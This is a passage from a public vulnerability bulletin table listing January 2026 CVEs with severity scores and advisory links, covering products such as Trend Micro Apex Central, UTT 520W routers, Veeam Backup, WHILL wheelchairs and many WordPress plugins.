| Trend Micro, Inc.--Trend Micro Apex Central | A LoadLibraryEX vulnerability in Trend Micro Apex Central could allow an unauthenticated remote attacker to load an attacker-controlled DLL into a key executable, leading to execution of attacker-supplied code under the context of SYSTEM on affected installations. | 2026-01-08 | 9.8 | CVE-2025-69258 | https://success.trendmicro.com/en-US/solution/KA-0022071 https://success.trendmicro.com/ja-JP/solution/KA-0022081 https://www.tenable.com/security/research/tra-2026-01 |
| Trend Micro, Inc.--Trend Micro Apex Central | A message unchecked NULL return value vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability.. | 2026-01-08 | 7.5 | CVE-2025-69259 | https://success.trendmicro.com/en-US/solution/KA-0022071 https://success.trendmicro.com/ja-JP/solution/KA-0022081 https://www.tenable.com/security/research/tra-2026-01 |
| Trend Micro, Inc.--Trend Micro Apex Central | A message out-of-bounds read vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability. | 2026-01-08 | 7.5 | CVE-2025-69260 | https://success.trendmicro.com/en-US/solution/KA-0022071 https://success.trendmicro.com/ja-JP/solution/KA-0022081 https://www.tenable.com/security/research/tra-2026-01 |
| TRENDnet--TEW-713RE | A vulnerability was detected in TRENDnet TEW-713RE 1.02. The impacted element is an unknown function of the file /goformX/formFSrvX. The manipulation of the argument SZCMD results in os command injection. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-06 | 9.8 | CVE-2025-15471 | VDB-339721 | TRENDnet TEW-713RE formFSrvX os command injection VDB-339721 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721441 | TRENDnet TEW-713RE 1.02 OS Command Injection https://pentagonal-time-3a7.notion.site/Command-Injection-Vulnerability-in-formFSrvX-of-Trendnet-TEW-713RE-2d1e5dd4c5a5801481abe7a944763d39 |
| TRENDnet--TEW-811DRU | A flaw has been found in TRENDnet TEW-811DRU 1.0.2.0. This affects the function setDeviceURL of the file uapply.cgi of the component httpd . This manipulation of the argument DeviceURL causes os command injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-06 | 7.2 | CVE-2025-15472 | VDB-339722 | TRENDnet TEW-811DRU httpd uapply.cgi setDeviceURL os command injection VDB-339722 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721874 | TRENDnet TEW-811DRU 1.0.4.0 OS Command Injection https://pentagonal-time-3a7.notion.site/TrendNet-TEW-811DRU-2d2e5dd4c5a58016a612e99853b835f8 |
| TryGhost--Ghost | Ghost is a Node.js content management system. In versions 5.105.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's 2FA mechanism allows staff users to skip email 2FA. This issue has been patched in versions 5.130.6 and 6.11.0. | 2026-01-10 | 8.1 | CVE-2026-22594 | https://github.com/TryGhost/Ghost/security/advisories/GHSA-5fp7-g646-ccf4 https://github.com/TryGhost/Ghost/commit/b59f707f670e6f175b669977724ccf16c718430b https://github.com/TryGhost/Ghost/commit/fc7bc2fb0888513498154ec5cb4b21eccb88de07 |
| TryGhost--Ghost | Ghost is a Node.js content management system. In versions 5.121.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's handling of Staff Token authentication allowed certain endpoints to be accessed that were only intended to be accessible via Staff Session authentication. External systems that have been authenticated via Staff Tokens for Admin/Owner-role users would have had access to these endpoints. This issue has been patched in versions 5.130.6 and 6.11.0. | 2026-01-10 | 8.1 | CVE-2026-22595 | https://github.com/TryGhost/Ghost/security/advisories/GHSA-9xg7-mwmp-xmjx https://github.com/TryGhost/Ghost/commit/9513d2a35c21067127ce8192443d8919ddcefcc8 https://github.com/TryGhost/Ghost/commit/c3017f81a5387b253a7b8c1ba1959d430ee536a3 |
| Tumult Inc--Tumult Hype Animations | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tumult Inc Tumult Hype Animations allows DOM-Based XSS.This issue affects Tumult Hype Animations: from n/a through 1.9.11. | 2026-01-05 | 7.1 | CVE-2024-30461 | https://vdp.patchstack.com/database/wordpress/plugin/tumult-hype-animations/vulnerability/wordpress-tumult-hype-animations-plugin-1-9-11-csrf-to-xss-vulnerability?_s_id=cve |
| Ubiquiti Inc--UBB-XG | A malicious actor in Wi-Fi range of the affected product could leverage a vulnerability in the airMAX Wireless Protocol to achieve a remote code execution (RCE) within the affected product. Affected Products: UBB-XG (Version 1.2.2 and earlier) UDB-Pro/UDB-Pro-Sector (Version 1.4.1 and earlier) UBB (Version 3.1.5 and earlier) Mitigation: Update your UBB-XG to Version 1.2.3 or later. Update your UDB-Pro/UDB-Pro-Sector to Version 1.4.2 or later. Update your UBB to Version 3.1.7 or later. | 2026-01-08 | 8.8 | CVE-2026-21638 | https://community.ui.com/releases/Security-Advisory-Bulletin-060-060/cde18da7-2bc4-41bb-a9cc-48a4a4c479c1 |
| Ubiquiti Inc--UCRM Argentina AFIP invoices Plugin | A Cross-Site Scripting (XSS) vulnerability in the UCRM Argentina AFIP invoices Plugin (v1.2.0 and earlier) could allow privilege escalation if an Administrator is tricked into visiting a crafted malicious page. This plugin is disabled by default. Affected Products: UCRM Argentina AFIP invoices Plugin (Version 1.2.0 and earlier) Mitigation: Update UCRM Argentina AFIP invoices Plugin to Version 1.3.0 or later. | 2026-01-05 | 7.5 | CVE-2025-59467 | https://community.ui.com/releases/Security-Advisory-Bulletin-057/6d3f2a51-22b8-47a1-9296-1e9dcd64e073 |
| Ubiquiti Inc--UniFi Protect Application | A malicious actor with access to the adjacent network could obtain unauthorized access to a UniFi Protect Camera by exploiting a discovery protocol vulnerability in the Unifi Protect Application (Version 6.1.79 and earlier). Affected Products: UniFi Protect Application (Version 6.1.79 and earlier). Mitigation: Update your UniFi Protect Application to Version 6.2.72 or later. | 2026-01-05 | 8.8 | CVE-2026-21633 | https://community.ui.com/releases/Security-Advisory-Bulletin-058-058/6922ff20-8cd7-4724-8d8c-676458a2d0f9 |
| UTT-- 520W | A security vulnerability has been detected in UTT è¿›å– 520W 1.7.7-180627. Affected by this issue is the function strcpy of the file /goform/formUser. Such manipulation of the argument passwd1 leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 8.8 | CVE-2025-15459 | VDB-339495 | UTT è¿›å– 520W formUser strcpy buffer overflow VDB-339495 | CTI Indicators (IOB, IOC, IOA) Submit #725816 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/22.md https://github.com/cymiao1978/cve/blob/main/new/22.md#poc |
| UTT-- 520W | A vulnerability was detected in UTT è¿›å– 520W 1.7.7-180627. This affects the function strcpy of the file /goform/formPptpClientConfig. Performing a manipulation of the argument EncryptionMode results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 8.8 | CVE-2025-15460 | VDB-339496 | UTT è¿›å– 520W formPptpClientConfig strcpy buffer overflow VDB-339496 | CTI Indicators (IOB, IOC, IOA) Submit #725817 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/23.md https://github.com/cymiao1978/cve/blob/main/new/23.md#poc |
| UTT-- 520W | A flaw has been found in UTT è¿›å– 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/formTaskEdit. Executing a manipulation of the argument selDateType can lead to buffer overflow. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 8.8 | CVE-2025-15461 | VDB-339497 | UTT è¿›å– 520W formTaskEdit strcpy buffer overflow VDB-339497 | CTI Indicators (IOB, IOC, IOA) Submit #725818 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/24.md https://github.com/cymiao1978/cve/blob/main/new/24.md#poc |
| UTT-- 520W | A vulnerability has been found in UTT è¿›å– 520W 1.7.7-180627. This issue affects the function strcpy of the file /goform/ConfigAdvideo. The manipulation of the argument timestart leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 8.8 | CVE-2025-15462 | VDB-339498 | UTT è¿›å– 520W ConfigAdvideo strcpy buffer overflow VDB-339498 | CTI Indicators (IOB, IOC, IOA) Submit #725819 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/25.md https://github.com/cymiao1978/cve/blob/main/new/25.md#poc |
| UTT-- 520W | A vulnerability was determined in UTT è¿›å– 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formConfigFastDirectionW. This manipulation of the argument ssid causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0836 | VDB-340436 | UTT è¿›å– 520W formConfigFastDirectionW strcpy buffer overflow VDB-340436 | CTI Indicators (IOB, IOC, IOA) Submit #729018 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/26.md |
| UTT-- 520W | A vulnerability was identified in UTT è¿›å– 520W 1.7.7-180627. This affects the function strcpy of the file /goform/formFireWall. Such manipulation of the argument GroupName leads to buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0837 | VDB-340437 | UTT è¿›å– 520W formFireWall strcpy buffer overflow VDB-340437 | CTI Indicators (IOB, IOC, IOA) Submit #729019 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/27.md |
| UTT-- 520W | A security flaw has been discovered in UTT è¿›å– 520W 1.7.7-180627. This impacts the function strcpy of the file /goform/ConfigWirelessBase. Performing a manipulation of the argument ssid results in buffer overflow. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0838 | VDB-340438 | UTT è¿›å– 520W ConfigWirelessBase strcpy buffer overflow VDB-340438 | CTI Indicators (IOB, IOC, IOA) Submit #729020 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/28.md |
| UTT-- 520W | A weakness has been identified in UTT è¿›å– 520W 1.7.7-180627. Affected is the function strcpy of the file /goform/APSecurity. Executing a manipulation of the argument wepkey1 can lead to buffer overflow. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0839 | VDB-340439 | UTT è¿›å– 520W APSecurity strcpy buffer overflow VDB-340439 | CTI Indicators (IOB, IOC, IOA) Submit #729028 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/29.md |
| UTT-- 520W | A security vulnerability has been detected in UTT è¿›å– 520W 1.7.7-180627. Affected by this vulnerability is the function strcpy of the file /goform/formConfigNoticeConfig. The manipulation of the argument timestart leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0840 | VDB-340440 | UTT è¿›å– 520W formConfigNoticeConfig strcpy buffer overflow VDB-340440 | CTI Indicators (IOB, IOC, IOA) Submit #729029 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/30.md |
| UTT-- 520W | A vulnerability was detected in UTT è¿›å– 520W 1.7.7-180627. Affected by this issue is the function strcpy of the file /goform/formPictureUrl. The manipulation of the argument importpictureurl results in buffer overflow. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0841 | VDB-340441 | UTT è¿›å– 520W formPictureUrl strcpy buffer overflow VDB-340441 | CTI Indicators (IOB, IOC, IOA) Submit #729030 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/31.md |
| Veeam--Backup And Recovery | This vulnerability allows a Backup or Tape Operator to perform remote code execution (RCE) as root by creating a malicious backup configuration file. | 2026-01-08 | 7.8 | CVE-2025-55125 | https://www.veeam.com/kb4792 |
| Veeam--Backup and Recovery | This vulnerability allows a Backup Administrator to perform remote code execution (RCE) as the postgres user by sending a malicious password parameter. | 2026-01-08 | 9 | CVE-2025-59468 | https://www.veeam.com/kb4792 |
| Veeam--Backup and Recovery | This vulnerability allows a Backup or Tape Operator to write files as root. | 2026-01-08 | 9 | CVE-2025-59469 | https://www.veeam.com/kb4792 |
| Veeam--Backup and Recovery | This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter. | 2026-01-08 | 9 | CVE-2025-59470 | https://www.veeam.com/kb4792 |
| vega--vega | Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. Prior to versions 6.1.2 and 5.6.3, applications meeting two conditions are at risk of arbitrary JavaScript code execution, even if "safe mode" expressionInterpreter is used. First, they use `vega` in an application that attaches both `vega` library and a `vega.View` instance similar to the Vega Editor to the global `window`, or has any other satisfactory function gadgets in the global scope. Second, they allow user-defined Vega `JSON` definitions (vs JSON that was is only provided through source code). This vulnerability allows for DOM XSS, potentially stored, potentially reflected, depending on how the library is being used. The vulnerability requires user interaction with the page to trigger. An attacker can exploit this issue by tricking a user into opening a malicious Vega specification. Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the application's domain. This can lead to theft of sensitive information such as authentication tokens, manipulation of data displayed to the user, or execution of unauthorized actions on behalf of the victim. This exploit compromises confidentiality and integrity of impacted applications.Patched versions are available in `vega-selections@6.1.2` (requires ESM) for Vega v6 and `vega-selections@5.6.3` (no ESM needed) for Vega v5. As a workaround, do not attach `vega` or `vega.View` instances to global variables or the window as the editor used to do. This is a development-only debugging practice that should not be used in any situation where Vega/Vega-lite definitions can come from untrusted parties. | 2026-01-05 | 8.1 | CVE-2025-65110 | https://github.com/vega/vega/security/advisories/GHSA-829q-m3qg-ph8r |
| vega--vega | vega-functions provides function implementations for the Vega expression language. Prior to version 6.1.1, for sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the public API) could be used to run unintentional javascript (XSS). This issue is fixed in vega-functions `6.1.1`. There is no workaround besides upgrading. Using `vega.expressionInterpreter` as described in CSP safe mode does not prevent this issue. | 2026-01-05 | 7.2 | CVE-2025-66648 | https://github.com/vega/vega/security/advisories/GHSA-m9rg-mr6g-75gm |
| veronalabs--SlimStat Analytics | The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'notes' and 'resource' parameters in all versions up to, and including, 5.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the Recent Custom Events report. | 2026-01-09 | 7.2 | CVE-2025-15055 | https://www.wordfence.com/threat-intel/vulnerabilities/id/afbfabfc-b923-4fe9-9e8f-0cf159f488db?source=cve https://plugins.trac.wordpress.org/changeset/3429990/wp-slimstat |
| veronalabs--SlimStat Analytics | The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `fh` (fingerprint) parameter in all versions up to, and including, 5.3.3. This is due to insufficient input sanitization and output escaping on the fingerprint value stored in the database. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator views the Real-time Access Log report. | 2026-01-09 | 7.2 | CVE-2025-15057 | https://www.wordfence.com/threat-intel/vulnerabilities/id/90920df9-1362-466b-b14b-4714087f556b?source=cve https://plugins.trac.wordpress.org/changeset/3428488/wp-slimstat |
| Waituk--Entrada | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Waituk Entrada allows SQL Injection.This issue affects Entrada: from n/a through 5.7.7. | 2026-01-05 | 9.3 | CVE-2025-39484 | https://vdp.patchstack.com/database/wordpress/theme/entrada/vulnerability/wordpress-entrada-theme-5-7-7-sql-injection-vulnerability?_s_id=cve |
| webrndexperts--Latest Registered Users | The Latest Registered Users plugin for WordPress is vulnerable to unauthorized user data export in all versions up to, and including, 1.4. This is due to missing authorization and nonce validation in the rnd_handle_form_submit function hooked to both admin_post_my_simple_form and admin_post_nopriv_my_simple_form actions. This makes it possible for unauthenticated attackers to export complete user details (excluding passwords and sensitive tokens) in CSV format via the 'action' parameter. | 2026-01-07 | 7.5 | CVE-2025-13493 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e6139543-81e3-480a-93a4-1d87b3f3f51e?source=cve https://plugins.trac.wordpress.org/browser/latest-registered-users/trunk/latest-registered-users.php#L246 https://plugins.trac.wordpress.org/browser/latest-registered-users/tags/1.4/latest-registered-users.php#L246 https://plugins.trac.wordpress.org/browser/latest-registered-users/trunk/latest-registered-users.php#L66 |
| WHILL--Model C2 Electric Wheelchair | WHILL Model C2 Electric Wheelchairs and Model F Power Chairs do not enforce authentication for Bluetooth connections. An attacker within range can pair with the device and issue movement commands, override speed restrictions, and manipulate configuration profiles without any credentials or user interaction. | 2026-01-05 | 9.8 | CVE-2025-14346 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-364-01 |
| woocommerce--WooCommerce Square | The WooCommerce Square plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.1 via the get_token_by_id function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to expose arbitrary Square "ccof" (credit card on file) values and leverage this value to potentially make fraudulent charges on the target site. | 2026-01-10 | 7.5 | CVE-2025-13457 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c7f4f726-7e53-4397-8d8b-7a574326adc6?source=cve https://plugins.trac.wordpress.org/changeset/3415850/woocommerce-square |
| WPweb--Follow My Blog Post | Missing Authorization vulnerability in WPweb Follow My Blog Post allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Follow My Blog Post: from n/a through 2.4.0. | 2026-01-05 | 7.5 | CVE-2025-68547 | https://vdp.patchstack.com/database/wordpress/plugin/follow-my-blog-post/vulnerability/wordpress-follow-my-blog-post-plugin-2-4-0-arbitrary-content-deletion-vulnerability?_s_id=cve |
| xfinitysoft--Reviewify Review Discounts & Photo/Video Reviews for WooCommerce | The Reviewify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'send_test_email' AJAX action in all versions up to, and including, 1.0.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to create arbitrary WooCommerce discount coupons, potentially causing financial loss to the store. | 2026-01-07 | 7.5 | CVE-2025-14070 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9db8756a-a177-4d39-b169-dc874cac2b3b?source=cve https://cwe.mitre.org/data/definitions/862.html https://plugins.trac.wordpress.org/browser/review-for-discount/trunk/admin/class-xswcrd-review-discounts-admin.php#L425 https://plugins.trac.wordpress.org/browser/review-for-discount/tags/1.0.6/admin/class-xswcrd-review-discounts-admin.php#L425 |
| xwiki-contrib--macro-fullcalendar | XWiki Full Calendar Macro displays objects from the wiki on the calendar. Prior to version 2.4.5, users with the right to view the Calendar.JSONService page (including guest users) can exploit a SQL injection vulnerability by accessing database info or starting a DoS attack. This issue has been patched in version 2.4.5. | 2026-01-10 | 10 | CVE-2025-65091 | https://github.com/xwiki-contrib/macro-fullcalendar/security/advisories/GHSA-2g22-wg49-fgv5 https://github.com/xwiki-contrib/macro-fullcalendar/commit/5fdcf06a05015786492fda69b4d9dea5460cc994 |
| Yerootech--iDS6 DSSPro Digital Signage System | iDS6 DSSPro Digital Signage System 6.2 contains an improper access control vulnerability that allows authenticated users to elevate privileges through console JavaScript functions. Attackers can create users, modify roles and permissions, and potentially achieve full application takeover by exploiting insecure direct object references. | 2026-01-06 | 8.8 | CVE-2020-36920 | ExploitDB-48992 Archived Yeroo Tech Vendor Homepage Zero Science Lab Disclosure (ZSL-2020-5608) Packet Storm Security Exploit Entry CXSecurity Vulnerability Database Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: iDS6 DSSPro Digital Signage System 6.2 Privilege Escalation via Access Control |
| yocoadmin--Yoco Payments | The Yoco Payments plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 3.8.8 via the file parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-01-07 | 7.5 | CVE-2025-13801 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ad74d5d0-270e-41d3-9596-2f71b05af276?source=cve https://plugins.trac.wordpress.org/browser/yoco-payment-gateway/tags/3.8.8/src/Helpers/Logs.php#L25 https://plugins.trac.wordpress.org/browser/yoco-payment-gateway/tags/3.8.8/src/Helpers/Logs.php#L59 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the pushstate event listener used by ui.sub_pages allows an attacker to manipulate the fragment identifier of the URL, which they can do despite being cross-site, using an iframe. This issue has been patched in version 3.5.0. | 2026-01-08 | 7.2 | CVE-2026-21873 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-mhpg-c27v-6mxr https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 |
| Zenitel--ICX500 | Remote Code Execution vulnerability that allows unauthenticated attackers to inject arbitrary commands into the hostname of the device. | 2026-01-09 | 10 | CVE-2025-64093 | Zenitel Security Advisory |
| Zenitel--ICX500 | This vulnerability allows unauthenticated attackers to inject an SQL request into GET request parameters and directly query the underlying database. | 2026-01-09 | 7.5 | CVE-2025-64092 | Zenitel Security Advisory |
| Zenitel--TCIS-3+ | This vulnerability allows authenticated attackers to execute commands via the hostname of the device. | 2026-01-09 | 10 | CVE-2025-64090 | Zenitel Security Advisory |
| Zenitel--TCIS-3+ | This vulnerability allows authenticated attackers to execute commands via the NTP-configuration of the device. | 2026-01-09 | 8.6 | CVE-2025-64091 | Zenitel Security Advisory |
| Zimbra--Collaboration | Zimbra Collaboration (ZCS) 10 before 10.0.18 and 10.1 before 10.1.13 allows Classic UI stored XSS via Cascading Style Sheets (CSS) @import directives in an HTML e-mail message. | 2026-01-05 | 7.2 | CVE-2025-66376 | https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.13#Security_Fixes https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.18#Security_Fixes |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| aaextensions--AA Block country | The AA Block Country plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.0.1. This is due to the plugin trusting user-supplied headers such as HTTP_X_FORWARDED_FOR to determine the client's IP address without proper validation or considering if the server is behind a trusted proxy. This makes it possible for unauthenticated attackers to bypass IP-based access restrictions by spoofing their IP address via the X-Forwarded-For header. | 2026-01-07 | 5.3 | CVE-2025-13694 | https://www.wordfence.com/threat-intel/vulnerabilities/id/037ac32a-dc2e-4e9f-9318-65dfee1c80e9?source=cve https://plugins.trac.wordpress.org/browser/aa-block-country/trunk/aablockcountry.php#L26 https://plugins.trac.wordpress.org/browser/aa-block-country/tags/1.0.1/aablockcountry.php#L26 |
| ABB--WebPro SNMP Card PowerValue | Improper Check for Unusual or Exceptional Conditions vulnerability in ABB WebPro SNMP Card PowerValue, ABB WebPro SNMP Card PowerValue UL.This issue affects WebPro SNMP Card PowerValue: through 1.1.8.K; WebPro SNMP Card PowerValue UL: through 1.1.8.K. | 2026-01-07 | 6.5 | CVE-2025-4675 | https://search.abb.com/library/Download.aspx?DocumentID=2CRT000009&LanguageCode=en&DocumentPartId=&Action=Launch |
| ABB--WebPro SNMP Card PowerValue | Insufficient Session Expiration vulnerability in ABB WebPro SNMP Card PowerValue, ABB WebPro SNMP Card PowerValue UL.This issue affects WebPro SNMP Card PowerValue: through 1.1.8.K; WebPro SNMP Card PowerValue UL: through 1.1.8.K. | 2026-01-07 | 6.5 | CVE-2025-4677 | https://search.abb.com/library/Download.aspx?DocumentID=2CRT000009&LanguageCode=en&DocumentPartId=&Action=Launch |
| aharonyan--Guest posting / Frontend Posting / Front Editor WP Front User Submit | The Guest posting / Frontend Posting / Front Editor - WP Front User Submit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/bfe/v1/revert' REST API endpoint in all versions up to, and including, 5.0.0. This makes it possible for unauthenticated attackers to delete arbitrary media attachments. | 2026-01-07 | 5.3 | CVE-2025-13419 | https://www.wordfence.com/threat-intel/vulnerabilities/id/874b3448-df4c-49c4-bf4f-435cf48f6305?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432207%40front-editor&new=3432207%40front-editor&sfp_email=&sfph_mail= |
| ahecht--AH Shortcodes | The AH Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'column' shortcode attribute in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14109 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b77243f-f48b-4a94-9d60-bf96dc26fe77?source=cve https://plugins.trac.wordpress.org/browser/ah-shortcodes/trunk/includes/shortcodes.php#L28 https://plugins.trac.wordpress.org/browser/ah-shortcodes/tags/1.0.2/includes/shortcodes.php#L28 |
| airesvsg--ACF to REST API | The ACF to REST API plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.4. This is due to insufficient capability checks in the update_item_permissions_check() method, which only verifies that the current user has the edit_posts capability without checking object-specific permissions (e.g., edit_post($id), edit_user($id), manage_options). This makes it possible for authenticated attackers, with Contributor-level access and above, to modify ACF fields on posts they do not own, any user account, comments, taxonomy terms, and even the global options page via the /wp-json/acf/v3/{type}/{id} endpoints, granted they can authenticate to the site. | 2026-01-07 | 4.3 | CVE-2025-12030 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5ab508fa-298c-48c1-8510-f2e0a881675a?source=cve https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L108 https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L120 |
| All-Dynamics Software--enlogic:show Digital Signage System | All-Dynamics Software enlogic:show 2.0.2 contains a session fixation vulnerability that allows attackers to set a predefined PHP session identifier during the login process. Attackers can forge HTTP GET requests to welcome.php with a manipulated session token to bypass authentication and potentially execute cross-site request forgery attacks. | 2026-01-06 | 5.3 | CVE-2020-36913 | Zero Science Lab Disclosure (ZSL-2020-5577) Vendor Changelog for Version 2.0.3 Packet Storm Security Exploit Entry IBM X-Force Vulnerability Database Entry VulnCheck Advisory: All-Dynamics Software enlogic:show 2.0.2 Session Fixation Authentication Bypass |
| alobaidi--The Tooltip | The The Tooltip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'the_tooltip' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13908 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d2bac05e-ecd0-427b-90a0-6cf78175cd19?source=cve https://plugins.trac.wordpress.org/browser/the-tooltip/trunk/the-tooltip.php#L92 https://plugins.trac.wordpress.org/browser/the-tooltip/tags/1.0.2/the-tooltip.php#L92 |
| Altera--Quartus Prime Pro | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Pro Installer (SFX) on Windows allows Search Order Hijacking.This issue affects Quartus Prime Pro: from 24.1 through 24.3.1. | 2026-01-06 | 6.7 | CVE-2025-14596 | https://www.altera.com/security/security-advisory/asa-0004 |
| Altera--Quartus Prime Pro | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Pro on Windows (System Console modules) allows Search Order Hijacking.This issue affects Quartus Prime Pro: from 17.0 through 25.1.1. | 2026-01-06 | 6.7 | CVE-2025-14605 | https://www.altera.com/security/security-advisory/asa-0004 |
| Altera--Quartus Prime Pro | Insecure Temporary File vulnerability in Altera Quartus Prime Pro Installer (SFX) on Windows allows : Use of Predictable File Names.This issue affects Quartus Prime Pro: from 24.1 through 25.1.1. | 2026-01-06 | 6.7 | CVE-2025-14612 | https://www.altera.com/security/security-advisory/asa-0004 |
| Altera--Quartus Prime Standard | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard Installer (SFX) on Windows, Altera Quartus Prime Lite Installer (SFX) on Windows allows Search Order Hijacking.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1. | 2026-01-06 | 6.7 | CVE-2025-14599 | https://www.altera.com/security/security-advisory/asa-0005 |
